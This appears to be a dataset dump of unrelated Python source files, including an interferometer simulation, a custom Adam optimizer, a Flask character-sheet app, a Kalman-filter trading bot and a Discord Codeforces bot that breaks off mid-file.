+{"seq_id":"306078104","text":"import numpy as np\nimport optical_elements as oe\nimport matplotlib.pyplot as plt\n\n### pretense with oe\n\ndef intensity(theta1,theta3,theta4,theta2min, theta2max,l= np.array([1,0]), theta1error = 0.0, theta3error = 0.0, aeff = 0.1, beff = .1, ceff = .1, deff = 0.0):\n \n \"\"\"\n the intensity function represents how the intensity of the laser light changes as it goes through the interferometer set up.\n \n Parameters\n ----------\n theta1 : integer\n this is the rotation angle of the 1st half wave plate\n theta3 : integer\n this is the rotation angle of the 2nd half wave plate\n theta4 : integer\n angle of rotation for the polarizer between exiting light and detector\n theta2min : float\n minimum angle for the middle imperfect polarizer\n theta2max : float\n maximum angle for the middle imperfect polarizer\n \n theta1error : float\n human error for x1 angle\n theta3error : float\n human error for x2 angle\n aeff : float\n polarization leakage for 1st half waveplate polarizer set up\n beff : float\n polarization leakage for middle polarizer\n ceff : float\n polarization leakage for 2nd half waveplate polarizer set up\n deff : float\n polarization leakage for the polarizer inbetween the interferometer set up and the detector\n Returns\n -------\n type :\n the return value should be a range of intensities that are a result of the final intensity coming out of the set up\n with different polarization angles.\n \"\"\"\n \n #make a function that spits out whatever your lights going to be depending on polarization (nothing should be set since we can \n \"gives the intensity going to the dark port\"\n # l = laser light going into interferometer horizonatlly polarized\n acw = oe.hwp(-theta1) @ oe.pol(n=aeff) @ oe.hwp(theta1+theta1error) # polarizer 1 with light coming in at a clockwise direction ( HWP @ pol@ )make sure both HWP can have dif angles\n accw = oe.hwp(theta1+theta1error) @ oe.pol(n=aeff) @ oe.hwp(-theta1) # polarizer 1 with light coming in at a counterclockwise direction\n ccw = oe.hwp(-theta3) @ oe.pol(n=ceff) @ oe.hwp(theta3+theta3error) # polarizer 3 with light coming in at a clockwise direction\n cccw = oe.hwp(theta3+theta3error) @ oe.pol(n=ceff) @ oe.hwp(-theta3) # polarizer 3 with light coming in at a counterclockwise direction\n d = oe.rm(theta4,n= deff) # perfect polarizer between exiting light and detector\n # leave a space here because x2s defining array and above variables defining matrices\n theta2s = np.arange(theta2min,theta2max,.1) # making an array of all the different rotation angles of polarizer between set max and min angles\n\n @np.vectorize # even though give and return one value its going to take finc and make it work on an array of values\n def darkport_intensity(theta2):\n \"\"\n \n bcw = oe.rm(theta2,n=beff) # polarizer 2 with light coming in at a clockwise direction\n bccw = oe.rm(-theta2,n=beff) # polarizer 2 with light coming in at a counterclockwise direction\n b = ((accw@ bccw@ cccw-ccw@ bcw@ acw)/2)\n a = b.transpose()\n c = (l@(a) @d @ (b)@ l)\n return (c)\n \n \n return(theta2s,darkport_intensity(theta2s))\n\n\ndef vertical(theta1, theta3, theta2min, theta2max, ymax=0.2,aeff = aeff ,beff = beff ,ceff = ceff, deff = deff):\n \"this plots the the vertical light coming out of the dark port\"\n x2s,Vt = intensity(theta1,theta3,90,theta2min,theta2max,aeff,beff,ceff,deff)\n f=plt.figure(figsize=(4,3))\n\n plt.plot(x2s,Vt,color=\"purple\")\n plt.xlabel(r'$\\phi$ (deg)')\n plt.ylabel(r'$I_b/I_0$')\n plt.title('Vertical Dark 
Port Intensity vs Polarizer Angle')\n plt.grid(True)\n plt.xlim((theta2min,theta2max))\n plt.ylim((0,ymax))\n plt.show()\n \n\n\n\ndef horizontal(theta1,theta3,theta2min, theta2max, ymax=0.2,aeff = aeff,beff = beff ,ceff = ceff,deff = deff ):\n \"this plots the horizontal light coming out of the darkport\"\n x2s,Hz = intensity(theta1,theta3,0, theta2min, theta2max,aeff,beff,ceff,deff)\n f=plt.figure(figsize=(4,3))\n\n plt.plot(x2s,Hz,color=\"magenta\")\n plt.xlabel(r\"$\\phi$ (deg)\")\n plt.ylabel(r\"$I_d/I_0$\")\n plt.title(\"Horizontal Dark Port Intensity vs Polarizer Angle\")\n plt.grid(True)\n plt.xlim((theta2min,theta2max))\n plt.ylim((0,ymax))\n plt.show()\n\n\n\ndef split(theta1,theta3,theta2min, theta2max,aeff = aeff,beff = beff ,ceff = ceff,deff = deff):\n \"bright port minus dark ratio to total initial intensity\"\n\n x2s,Vt = intensity(theta1,theta3,90,theta2min, theta2max,aeff,beff,ceff,deff)\n x2s,Hz = intensity(theta1,theta3,0,theta2min, theta2max,aeff,beff,ceff,deff)\n s = Vt-Hz / (Hz+Vt)\n f=plt.figure(figsize=(4,3))\n\n plt.plot(x2s,s,color=\"aqua\")\n plt.xlabel(r'$\\phi$ (deg)')\n plt.ylabel(r'$(I_v-I_h)/(I_h+I_v)$')\n plt.title('Dark Port Intensity Difference')\n plt.xlim((theta2min,theta2max))\n plt.grid(True)\n plt.show()","sub_path":"interferometer.py","file_name":"interferometer.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"598145786","text":"import math\nimport torch\nfrom torch.optim.optimizer import Optimizer\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nclass Adam(Optimizer):\n def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,\n weight_decay=0):\n # Invalid input parameters raise error\n if not 0.0 <= lr:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if not 0.0 <= eps:\n raise ValueError(\"Invalid epsilon value: {}\".format(eps))\n if not 0.0 <= betas[0] < 1.0:\n raise ValueError(\"Invalid beta parameter at index 0: {}\".format(betas[0]))\n if not 0.0 <= betas[1] < 1.0:\n raise ValueError(\"Invalid beta parameter at index 1: {}\".format(betas[1]))\n defaults = dict(lr=lr, betas=betas, eps=eps,\n weight_decay=weight_decay)\n super(Adam, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(Adam, self).__setstate__(state)\n\n def step(self):\n loss = None\n for group in self.param_groups:\n # Actually, only one group\n # group = {'params': ...,\n # 'lr': 0.001,\n # 'betas': (0.9, 0.999),\n # ...}\n for p in group['params']:\n if p.grad is None:\n continue\n grad = p.grad.data\n state = self.state[p] # initially, state = {}\n # State initialization\n if len(state) == 0:\n state['step'] = 0\n # Exponential moving average of gradient values\n state['exp_avg'] = torch.zeros_like(p.data)\n # Exponential moving average of squared gradient values\n state['exp_avg_sq'] = torch.zeros_like(p.data)\n\n exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']\n beta1, beta2 = group['betas']\n\n state['step'] += 1\n\n if group['weight_decay'] != 0:\n grad.add_(group['weight_decay'], p.data)\n\n # Decay the first and second moment running average coefficient\n exp_avg.mul_(beta1).add_(1 - beta1, grad)\n exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)\n denom = exp_avg_sq.sqrt().add_(group['eps'])\n\n bias_correction1 = 1 - beta1 ** state['step']\n bias_correction2 = 1 - beta2 ** state['step']\n step_size = group['lr'] * math.sqrt(bias_correction2) / 
bias_correction1\n\n                p.data.addcdiv_(-step_size, exp_avg, denom)\n\n        return loss\ndef num_flat_features(x):\n    size = x.size()[1:]  # all dimensions except the batch dimension\n    num_features = 1\n    for s in size:\n        num_features *= s\n    return num_features\nclass FC(nn.Module):\n    def __init__(self, activation=\"relu\", drop_rate=0):\n        super(FC, self).__init__()\n        self.activation = activation\n        self.drop_rate = drop_rate\n        self.type = 'fc'\n        self.fc1 = nn.Linear(784, 1000)\n        self.fc2 = nn.Linear(1000, 1000)\n        self.fc3 = nn.Linear(1000, 10)\n        self.activations = nn.ModuleDict([\n            ['relu', nn.ReLU()],\n            ['sigmoid', nn.Sigmoid()]\n        ])\n        if self.drop_rate:\n            self.input_dropout = nn.Dropout(0.2)\n            self.dropout = nn.Dropout(self.drop_rate)\n\n    def forward(self, x):\n        x = x.view(-1, num_flat_features(x)) #flattened input 28 x 28 = 784\n        if self.drop_rate:\n            x = self.input_dropout(x)\n        x = self.activations[self.activation](self.fc1(x))\n        if self.drop_rate:\n            x = self.dropout(x)\n        x = self.activations[self.activation](self.fc2(x))\n        if self.drop_rate:\n            x = self.dropout(x)\n        x = self.activations[self.activation](self.fc3(x))\n        return F.log_softmax(x, dim=1)\n\nif __name__ == '__main__':\n    use_cuda = torch.cuda.is_available()\n    device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n    kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n    dataset = torch.utils.data.DataLoader(\n        datasets.MNIST('../data', train=True, download=True,\n                       transform=transforms.Compose([\n                           transforms.ToTensor(),\n                           transforms.Normalize((0.1307,), (0.3081,))\n                       ])),\n        batch_size=128, shuffle=True, **kwargs)\n    model = FC().to(device)\n    optimizer = Adam(model.parameters())\n    for input, target in dataset:\n        input, target = input.to(device), target.to(device)\n        optimizer.zero_grad()\n        output = model(input)\n        loss = F.nll_loss(output, target)\n        loss.backward()\n        optimizer.step()\n        break\n","sub_path":"adam/adam.py","file_name":"adam.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"206844569","text":"# --- import ---\nimport common\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nimport json\nimport sys\n\nahost = common.args[1]\nl = common.blueprint()\ntoken = l[0]\nbp_id = l[1]\nbp_qe_post_system_systemtype = common.bp_qe_post_system_systemtype(token, bp_id)\ndeploy_mode = common.deploy_mode\n\n# Get node id list (server) and patch deploy mode\ndef patch_deploy_mode():\n    # Create payload\n    input_mode = input('deploy_mode:')\n    if input_mode in deploy_mode:\n        payload = {'nodes': {}}\n        for i in bp_qe_post_system_systemtype['items']:\n            payload['nodes'][i['system']['id']] = {'deploy_mode':input_mode}\n    else:\n        print ('Error: Wrong deploy mode')\n        sys.exit()\n    # Patch deploy mode\n    ep = 'https://' + ahost + '/api/blueprints/{blueprint_id}'.format(blueprint_id = bp_id)\n    requests.patch(ep, headers={'AUTHTOKEN':token, 'Content-Type':'application/json'}, data=json.dumps(payload), verify=False)\n\npatch_deploy_mode()\n","sub_path":"library/patch_deploy_mode_server.py","file_name":"patch_deploy_mode_server.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"594745980","text":"dic = dict()\n\nwith open(r\"E:\\LPF\\2017\\KGL-ratio-1.gene2effect.np\",\"r\") as f:\n    data = f.readlines() \n    for line in data:\n        # split each line on the tab; strip the trailing newline from the value\n        key=line.split(\"\\t\")[0]\n        value=line.split(\"\\t\")[1].strip()\n        if key in dic.keys():\n            dic[key].append(value)\n        else:\n            dic[key] = [value]\n    print(dic)\nf6 = open(r\"E:\\LPF\\2017\\KGL-ratio-1.gene2effect.final.np\",'w+')\nfor key in dic:\n    #f6.write(key+'\\t'+ ' '.join(str(i).replace('\\n',\"\") for i in dic[key])+'\\n')\n    sum=0\n    for i in dic[key]:\n        sum+=abs(float(i))\n    f6.write(key+'\\t'+ str(sum)+'\\n')\nf6.close()","sub_path":"mergeDuplicate+sum.py","file_name":"mergeDuplicate+sum.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"630464790","text":"# Uses python3\nimport sys\n\ndef get_optimal_value(capacity, weights, values):\n    value = 0.\n    # get value per unit\n    v_u = [(v, w, v/w) for w, v in zip(weights, values)]\n    v_u = sorted(v_u, key=lambda x: x[2], reverse = True)\n\n    for idx in range(len(v_u)):\n        if capacity == 0:\n            return value\n        \n        a = min(v_u[idx][1], capacity)\n        value = value + a*v_u[idx][2]\n        capacity -= a\n\n    return value\n\n\nif __name__ == \"__main__\":\n    data = list(map(int, sys.stdin.read().split()))\n    n, capacity = data[0:2]\n    values = data[2:(2 * n + 2):2]\n    weights = data[3:(2 * n + 2):2]\n    opt_value = get_optimal_value(capacity, weights, values)\n    print(\"{:.10f}\".format(opt_value))\n","sub_path":"algorithmic-toolbox/week3_greedy_algorithms/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"76436048","text":"from flask import Flask\nfrom flask import jsonify\nfrom flask import request\nimport json\n\nimport os #This is for list of files and directories\napp = Flask(__name__)\n\n\n@app.route('/')\ndef landing():\n    with open('landing.html') as f:\n        read_data = f.read()\n    return read_data\n    \n@app.route('/test')\ndef read_file():\n    with open('test.html') as f:\n        read_data = f.read()\n    return read_data\n\n    \n@app.route('/form')\ndef form_file():\n    with open('form.txt') as f:\n        read_data = f.read()\n    return read_data\n    \n    \n    \n@app.route('/character', methods=['POST'])\ndef character():\n    print (\"test CHARS\")\n    data = \"\"\n    data_loaded = \"\"\n    sel = request.get_json()\n    with open('json_demo.json', 'r') as json_file:\n        data = json_file.read()\n        data_loaded = json.loads(data)\n    \n\n    \n    if (data_loaded['character'][sel['tar']]['health'] >= 4):\n        data_loaded['character'][sel['tar']]['health'] = 4\n    else:\n        data_loaded['character'][sel['tar']]['health'] += 1\n\n    \n    with open('json_demo.json', 'w') as json_file:\n        json.dump(data_loaded, json_file)\n\n    print (data_loaded['character'][sel['tar']])\n    return jsonify(data_loaded['character'][sel['tar']])\n    \n@app.route('/characterNewX', methods=['POST'])\ndef characterNewX():\n    data = request.get_json()\n    print (data.get('name', ''))\n    data_loaded = \"\"\n    with open('json_demo.json', 'r') as json_file:\n        data_loaded = json.loads(json_file.read())\n    print (data)\n    print (data_loaded['character'])\n    data_loaded['character'].append(data)\n    \n    with open('json_demo.json', 'w') as json_file:\n        json.dump(data_loaded, json_file)\n    \n    return ('', 200)\n    \n@app.route('/characterHide', methods=['POST'])\ndef characterHide():\n    arr = os.listdir(\"chars\")\n    listString = \"\"\n    for member in arr:\n        listString += member.replace('.json', '') + \",\"\n    listString = listString[:-1]\n    \n    return 
listString\n    \n\n@app.route('/characterEx')\ndef characterEx():\n    with open('characterEx.html') as f:\n        read_data = f.read()\n    return read_data\n    \n@app.route('/characterLoad', methods=['POST'])\ndef characterLoad():\n    char = request.args.get('char')\n    data = \"\"\n    print (char)\n    \n    with open(\"chars/\" + char + \".json\", 'r') as json_file:\n        data = json_file.read()\n        data = json.loads(data)\n    \n    print (data)\n    return data\n    \n@app.route('/characterHealthInc', methods=['POST'])\ndef characterHealthInc():\n    char = request.args.get('char')\n    data = \"\"\n    print (char)\n    \n    with open(\"chars/\" + char + \".json\", 'r') as json_file:\n        data = json_file.read()\n        data = json.loads(data)\n    \n    if (data['health'] >= 4):\n        data['health'] = 4\n    else:\n        data['health'] += 1\n    print (data)\n    with open(\"chars/\" + char + \".json\", 'w') as json_file:\n        json.dump(data, json_file)\n    return data\n    \n    \n@app.route('/characterHealthDec', methods=['POST'])\ndef characterHealthDec():\n    char = request.args.get('char')\n    data = \"\"\n    print (char)\n    \n    with open(\"chars/\" + char + \".json\", 'r') as json_file:\n        data = json_file.read()\n        data = json.loads(data)\n    \n    if (data['health'] <= 0):\n        data['health'] = 0\n    else:\n        data['health'] -= 1\n    print (data)\n    with open(\"chars/\" + char + \".json\", 'w') as json_file:\n        json.dump(data, json_file)\n    return data\n    \n@app.route('/characterNew')\ndef characterNew():\n    char = request.args.get('char')\n    data = \"\"\n    with open(\"charsTemplates/\" + char + \".html\", 'r') as f:\n        data = f.read()\n    return data\n    \n@app.route('/characterSave', methods=['POST'])\ndef characterSave():\n    char = request.args.get('char')\n    data = request.get_json()\n\n    print (os.path.isfile(\"chars/\" + char + \".json\"))\n    if (os.path.isfile(\"chars/\" + char + \".json\") == False):\n        with open(\"chars/\" + char + \".json\", 'w') as json_file:\n            json.dump(data, json_file)    \n        return ('ok')\n    else:\n        return ('bad')\n    \n@app.route('/merc')\ndef merc():\n    with open('charsTemplates\\mercenary.html') as f:\n        read_data = f.read()\n    return read_data\n    \n#Create a template function for new character creation\n#Create a processing function for each file","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"567823872","text":"import scrapy\nclass Test(scrapy.Spider):\n    name = \"cornell\" # define the spider name\n    start_urls=['https://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html'] # the page to crawl\n    def start_requests(self):\n        # define the links to crawl\n        urls = ['https://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html']\n        for url in urls:\n            yield scrapy.Request(url=url,callback=self.parse) # hand each crawled page to the parse method for processing\n    def parse(self, response):\n        datas1 = response.xpath('//*[@id=\"id1\"]/div/div/p/text()').extract()\n        datas2 = response.xpath('//*[@id=\"id2\"]/div/div/p/text()').extract()\n        filename1=\"movie_lines.txt\"\n        filename2=\"movie_conversations.txt\"\n        with open(filename1, 'w',encoding='utf-8') as f1:\n            for each_data1 in datas1:\n                f1.write(each_data1)\n                f1.write(\"\\n\")\n            f1.close()\n\n        with open(filename2, 'w', encoding='utf-8') as f2:\n            for each_data2 in datas2:\n                f2.write(each_data2)\n                f2.write(\"\\n\")\n            f2.close()\n","sub_path":"cornellScrapy/cornellScrapy/spiders/cornell.py","file_name":"cornell.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"554790030","text":"import 
random\nimport sys\nimport time\nimport numpy as np\nfrom collections import deque\nimport argparse\n\nV = set()\nS = set()\n\n\n\ndef R_v(adj, v, former_temp):\n temp = set()\n if not(v in former_temp):\n temp.add(v)\n s_temp = set({v})\n while s_temp:\n a = set()\n for i in s_temp:\n if not(i in adj):\n continue\n for j in adj[i]:\n if not(j in temp) and not(j in former_temp): \n temp.add(j)\n a.add(j)\n s_temp = a\n return len(temp)\n\ndef R_first_v(adj, v):\n temp = set({v})\n s_temp = set({v})\n while s_temp:\n a = set()\n for i in s_temp:\n if not(i in adj):\n continue\n for j in adj[i]:\n if not(j in temp): \n temp.add(j)\n a.add(j)\n s_temp = a\n return len(temp)\n\ndef cal_R(adj, S):\n temp = set()\n s_temp = S.copy()\n temp = temp | s_temp\n while s_temp:\n a = set()\n for i in s_temp:\n if not(i in adj):\n continue\n for j in adj[i]:\n b = random.random()\n if b < 0.01 and not(j in temp):\n temp.add(j)\n a.add(j)\n s_temp = a\n\n return len(temp)\n\ndef R_S(adj, v, former_temp):\n s_temp = set()\n if v == 1000000:\n return 0\n s_temp.add(v)\n former_temp.add(v)\n while s_temp:\n a = set()\n for i in s_temp:\n if not(i in adj):\n continue\n for j in adj[i]:\n if not(j in former_temp): \n former_temp.add(j)\n a.add(j)\n s_temp = a\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-k', type=int, default=None)\n parser.add_argument('-dat', type=str, default=None)\n args = parser.parse_args()\n\n K = args.k\n graph_file = args.dat\n\n t_start = time.time()\n f = open(graph_file,\"r\")\n\n adj={}\n G = []\n cnt = 0\n fr = f.readlines()\n all_num = int(fr[0].split(\" \")[1])\n print(all_num)\n for i in range(100):\n G.append({})\n for line in fr[1:]:\n a = line.split('\\r')[0].split(' ')\n b = int(a[0])\n c = int(a[1])\n if not(b in adj):\n adj[b] = [] \n adj[b].append(c)\n for j in range(100):\n if random.random() < 0.01:\n if not(b in G[j]):\n G[j][b] = []\n G[j][b].append(c)\n if not(c in adj):\n adj[c] = [] \n adj[c].append(b)\n for j in range(100):\n if random.random() < 0.01:\n if not(c in G[j]):\n G[j][c] = []\n G[j][c].append(b)\n t_adj = time.time()\n print(\"generating adj time: \", t_adj - t_start)\n V = set(adj.keys())\n print(\"Finishing generating Gi!\")\n\n influence_dict = {}\n\n for i in V:\n num = 0 \n for j in G:\n num += R_first_v(j, i)\n influence_dict[i] = num\n print(\"cal_time: \", time.time() - t_adj)\n order = sorted(influence_dict, key = lambda a: influence_dict[a], reverse=True)\n former_temp = []\n for i in range(len(G)):\n former_temp.append(set())\n S.add(order[0])\n print(\"step: \", 0, \"num\", influence_dict[order[0]], \"S\", S)\n for j in range(len(G)):\n R_S(G[j], order[0], former_temp[j])\n influence_dict.pop(order[0])\n order.remove(order[0])\n for i in range(K-1):\n k = 0\n index_ = 0\n maximum = 0\n while 1:\n v = order[k]\n num = 0\n for j in range(len(G)):\n num += R_v(G[j], v, former_temp[j])\n \n influence_dict[v] = num\n if num > maximum:\n maximum = num\n index = k\n influence_dict[v] = num\n if influence_dict[order[k]] < influence_dict[order[k + 1]]:\n k += 1\n else:\n break\n \n if maximum > influence_dict[order[k + 1]]:\n k = index\n break\n S.add(order[k])\n for j in range(len(G)):\n R_S(G[j], order[k], former_temp[j])\n \n print(\"step: \", i + 1, \"num\", influence_dict[order[k]], \"S\", S)\n influence_dict.pop(order[k])\n order = sorted(influence_dict, key = lambda a: influence_dict[a], reverse=True)\n\n t_finds = time.time()\n t = t_finds - t_start\n print(\"Time: \", t)\n print(S)\n \n 
cnt = 0\n for i in range(10000):\n cnt += cal_R(adj, S) \n cnt /= 10000\n \n print(\"influence: \", cnt)\n print(\"cal_time: \", time.time() - t_finds)\n \n \n \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sg/StaticGreedyCELF_undirected_UIC.py","file_name":"StaticGreedyCELF_undirected_UIC.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"491753879","text":"#!/usr/bin/env python\n\nfrom datetime import datetime\nimport logging\nimport numpy as np\nfrom .base import FractTrader, FractTradeHelper\n\n\nclass KalmanFilter:\n def __init__(self, x_hat0, v_err0, v_sys_err, v_obs_err):\n self.x_hat = np.array([x_hat0]) # a posteri estimate of x\n self.v_err = np.array([v_err0]) # a posteri error estimate\n self.v_sys_err = v_sys_err # process variance\n self.v_obs_err = v_obs_err # estimate of measurement variance\n\n def update(self, x):\n x_hat_m = self.x_hat[-1] # a priori estimate of x\n v_err_m = self.v_err[-1] + self.v_sys_err # a priori error estimate\n k = v_err_m / (v_err_m + self.v_obs_err) # gain or blending factor\n self.x_hat = np.append(self.x_hat, x_hat_m + k * (x - x_hat_m))\n self.v_err = np.append(self.v_err, (1 - k) * v_err_m)\n return self.x_hat[-1]\n\n def update_offline(self, x_array):\n [self.update(x=x) for x in x_array]\n return self.x_hat[-1]\n\n\nclass Kalman(FractTrader):\n def __init__(self, oanda, margin_ratio, model, quiet=False):\n super().__init__(oanda=oanda,\n margin_ratio=margin_ratio,\n model=model,\n quiet=quiet)\n\n def _kalman_filter(self, window):\n return (\n lambda v0:\n KalmanFilter(\n x_hat0=window['midpoints'][0],\n v_err0=v0,\n v_sys_err=v0 * self.model['error']['sys_var'],\n v_obs_err=v0 * self.model['error']['obs_var']\n )\n )(\n v0=window['midpoints'][\n -int(self.model['error']['ref_window']):\n ].var(ddof=1)\n )\n\n def fire(self, instrument):\n t0 = datetime.now()\n rate = self._get_rate(instrument=instrument)\n logging.debug('rate: {}'.format(rate))\n helper = FractTradeHelper(name=self.__class__.__name__,\n instrument=instrument,\n quiet=self.quiet)\n\n if rate['halted']:\n helper.print_log('Skip for trading halted.')\n helper.sleep(last=t0, sec=0.5)\n else:\n prices = self._get_prices()\n logging.debug('prices: {}'.format(prices))\n helper.sleep(last=t0, sec=0.5)\n\n units = self._calc_units(rate=rate,\n prices=prices,\n margin=self._get_margin())\n logging.debug('units: {}'.format(units))\n helper.sleep(last=t0, sec=1)\n\n if units == 0:\n helper.print_log('Skip for lack of margin.')\n else:\n wi = self._get_window(instrument=instrument)\n ws = self._calc_window_stat(window=wi)\n logging.debug('ws: {}'.format(ws))\n\n max_spread = ws['std'] * self.model['sigma']['max_spread']\n logging.debug('max_spread: {}'.format(max_spread))\n\n if prices[instrument]['spread'] > max_spread:\n helper.print_log('Skip for large spread.')\n else:\n kf = self._kalman_filter(window=wi)\n kf.update_offline(x_array=wi['midpoints'])\n logging.debug('kf.x_hat: {}'.format(kf.x_hat))\n\n x_delta = np.float32(kf.x_hat[-1] - kf.x_hat[-2])\n threshold = np.float32(\n ws['std'] * self.model['sigma']['entry_trigger']\n )\n logging.debug('x_delta: {0}, threshold: {1}'.format(\n x_delta, threshold\n ))\n\n if x_delta - threshold > 0:\n helper.print_order_log(\n response=self._place_order(sd=ws['std'],\n prices=prices,\n rate=rate,\n side='buy',\n units=units)\n )\n elif x_delta + threshold < 0:\n helper.print_order_log(\n 
response=self._place_order(sd=ws['std'],\n prices=prices,\n rate=rate,\n side='sell',\n units=units)\n )\n else:\n helper.print_log('Skip by the criteria.')\n\n return rate\n","sub_path":"fract/model/kalman.py","file_name":"kalman.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617879029","text":"import io\nimport os\nimport time\nimport datetime\nimport random\n\nimport aiohttp\nfrom matplotlib import pyplot as plt\n\nimport discord\nfrom discord.ext import commands\n\nfrom tle.cogs.util import codeforces_api as cf\n\nclass Codeforces(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(brief='Recommend a problem')\n async def gitgud(self, ctx, handle: str, delta : int = 0, tag : str = 'all'):\n \"\"\"Recommends a problem based on Codeforces rating of the handle provided.\"\"\"\n\n def round_rating(rating):\n rem = rating % 100\n rating -= rem\n return rating + 100 if rem >= 50 else rating\n\n try:\n probresp = await cf.problemset.problems()\n inforesp = await cf.user.info(handles=[handle])\n subsresp = await cf.user.status(handle=handle)\n except aiohttp.ClientConnectionError:\n await ctx.send('Error connecting to Codeforces API')\n return\n except cf.NotFoundError:\n await ctx.send(f'Handle not found: `{handle}`')\n return\n except cf.CodeforcesApiError:\n await ctx.send('Codeforces API denied the request, please make the handle is valid.')\n return\n\n user_rating = inforesp[0].get('rating')\n if user_rating is None:\n # Assume unrated is noob\n user_rating = 500\n user_rating = round_rating(user_rating + delta)\n problems = probresp['problems']\n recommendations = {}\n for problem in problems:\n if '*special' not in problem['tags'] and problem.get('rating') == user_rating:\n if 'contestId' in problem and (tag == 'all' or tag in problem['tags']):\n name = problem['name']\n contestid = problem['contestId']\n index = problem['index']\n rating = problem['rating']\n # Consider (name, rating) as key\n recommendations[(name, rating)] = (contestid, index)\n\n for sub in subsresp:\n problem = sub['problem']\n if sub['verdict'] == 'OK' and 'rating' in problem:\n name = problem['name']\n rating = problem['rating']\n recommendations.pop((name, rating), None)\n\n if not recommendations:\n await ctx.send('{} is already too gud'.format(handle))\n else:\n name, rating = random.choice(list(recommendations.keys()))\n contestid, index = recommendations[(name, rating)]\n # 'from' and 'count' are for ranklist, query minimum allowed (1) since we do not need it\n contestresp = await cf.contest.standings(contestid=contestid, from_=1, count=1)\n contestname = contestresp['contest']['name']\n title = f'{index}. 
{name}'\n url = f'{cf.CONTEST_BASE_URL}{contestid}/problem/{index}'\n desc = f'{contestname}\\nRating: {rating}'\n await ctx.send(\n f'Recommended problem for `{handle}`', embed=discord.Embed(title=title, url=url, description=desc))\n\n @commands.command(brief='Compare epeens.')\n async def rating(self, ctx, *handles: str):\n \"\"\"Compare epeens.\"\"\"\n if not handles or len(handles) > 5:\n await ctx.send('Number of handles must be between 1 and 5')\n return\n\n plt.clf()\n rate = []\n for handle in handles:\n try:\n contests = await cf.user.rating(handle=handle)\n except aiohttp.ClientConnectionError:\n await ctx.send('Error connecting to Codeforces API')\n return\n except cf.NotFoundError:\n await ctx.send(f'Handle not found: `{handle}`')\n return\n except cf.CodeforcesApiError:\n await ctx.send('Codeforces API denied the request, please make sure handles are valid.')\n return\n\n ratings = []\n times = []\n for contest in contests:\n ratings.append(contest['newRating'])\n times.append(datetime.datetime.fromtimestamp(contest['ratingUpdateTimeSeconds']))\n plt.plot(\n times, ratings, linestyle='-', marker='o', markersize=3, markerfacecolor='white', markeredgewidth=0.5)\n rate.append(ratings[-1])\n\n ymin, ymax = plt.gca().get_ylim()\n colors = [('#AA0000', 3000, 4000), ('#FF3333', 2600, 3000), ('#FF7777', 2400, 2600), ('#FFBB55', 2300, 2400),\n ('#FFCC88', 2100, 2300), ('#FF88FF', 1900, 2100), ('#AAAAFF', 1600, 1900), ('#77DDBB', 1400, 1600),\n ('#77FF77', 1200, 1400), ('#CCCCCC', 0, 1200)]\n\n for color, lo, hi in colors:\n plt.axhspan(lo, hi, facecolor=color)\n plt.ylim(ymin, ymax)\n plt.gcf().autofmt_xdate()\n locs, labels = plt.xticks()\n for loc in locs:\n plt.axvspan(loc, loc, facecolor='white')\n\n zero_width_space = '\\u200b'\n labels = [f'{zero_width_space}{handle} ({rating})' for handle, rating in zip(handles, rate)]\n plt.legend(labels)\n discord_file = self.get_current_figure_as_file()\n await ctx.send(file=discord_file)\n\n @commands.command(brief='Show histogram of solved problems on CF.')\n async def solved(self, ctx, *handles: str):\n \"\"\"Shows a histogram of problems solved on Codeforces for the handles provided.\"\"\"\n if not handles or len(handles) > 5:\n await ctx.send('Number of handles must be between 1 and 5')\n return\n\n allratings = []\n\n for handle in handles:\n try:\n submissions = await cf.user.status(handle=handle)\n except aiohttp.ClientConnectionError:\n await ctx.send('Error connecting to Codeforces API')\n return\n except cf.NotFoundError:\n await ctx.send(f'Handle not found: `{handle}`')\n return\n except cf.CodeforcesApiError:\n await ctx.send('Codeforces API denied the request, please make sure handles are valid.')\n return\n\n problems = set()\n for submission in submissions:\n if submission['verdict'] == 'OK':\n problem = submission['problem']\n # CF problems don't have IDs! 
